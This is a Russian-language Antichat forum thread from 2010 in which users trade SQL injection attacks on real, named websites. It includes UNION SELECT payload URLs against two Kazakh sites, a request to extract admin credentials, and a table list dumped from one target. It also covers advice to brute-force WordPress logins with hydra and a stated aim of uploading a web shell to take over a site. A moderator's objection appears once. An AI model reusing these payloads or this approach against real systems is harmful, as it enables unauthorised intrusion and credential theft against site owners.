Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

03.01.2010, 22:26
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме: 327555
Репутация:
1
|
|
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9
Можно ли вытащить логин и пароль от админки
|
|
|

03.01.2010, 22:31
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от FaTRuS
www.prima-group.kz
http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%2 8%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+
|
|
|

03.01.2010, 23:04
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от FaTRuS
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9
Можно ли вытащить логин и пароль от админки
Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами.
Скриптом достал спиоск таблиц,может пригодиться.
Код:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CHANNEL
CHANNEL_NEW
CHANNEL_POLL
NEWS
NEWS1
POLL
PRICES
|
|
|

04.01.2010, 10:22
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме: 327555
Репутация:
1
|
|
если можешь поделись скриптом плз можешь в личку
ЭТО НЕ СПЕЦ РАЗДЕЛ ДЛЯ ТВОИХ ВОПРОСОВ
Здесь не спрашивают как тебе поломать сайт , или что с этим можно сделать//HAXTA4OK
Последний раз редактировалось HAXTA4OK; 05.01.2010 в 13:05..
|
|
|

06.01.2010, 03:45
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 24
Провел на форуме: 174204
Репутация:
24
|
|
Подскажите чем брутить wordpress?
|
|
|

06.01.2010, 04:06
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 94
Провел на форуме: 999862
Репутация:
19
|
|
Сообщение от vsid55
Подскажите чем брутить wordpress?
hydra
|
|
|

10.01.2010, 17:41
|
|
Новичок
Регистрация: 15.01.2008
Сообщений: 15
Провел на форуме: 203657
Репутация:
0
|
|
Подскажите пожалуйста есть ли какие-то уязвимости в движках:
NPJ
и
WebGui
Если есть то какие 
|
|
|

15.01.2010, 08:04
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме: 327555
Репутация:
1
|
|
У меня возник вопрос есть сайты у которы структуре php немного изменена
Допустим http://www.mister-wong.ru/stuff/#toolbar подвержены ли такие сайты уязвимостям типа sql inj или другим уязвимостям
|
|
|

15.01.2010, 18:35
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме: 60679
Репутация:
10
|
|
Уважаемые, несколько раз натыкался на всякие php скрипты - они же exploit-ы к форумам типа IPB и PHPBB, в.т.ч. и 3 версии.
Просьба: подскажите тему, где есть полная информация о том как этим делом пользоваться.
ОС, софт и тд..
Вот по инъекциям нашел такой ФАК http://www.hackzone.ru/news/sql_inj.html очень мне помог, хотелось бы и по cross site scripting-у
В общем в итоге хочется залить шелл, получить админа сайта как минимум.
пишите тут или в личку.. Большое спасибо!
|
|
|

15.01.2010, 21:51
|
|
Познающий
Регистрация: 14.10.2009
Сообщений: 39
Провел на форуме: 146967
Репутация:
2
|
|
Привет всем! народ подскажите пожалуйста что означает вот эта вот ошибочка
Код:
! PHP for the selected domain has failed.
Installatron is unable to install to a domain where PHP is not working.
Your hosting provider can help you resolve this error.
Error code: 1; HTTP code: 500
Заранее спасибо!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|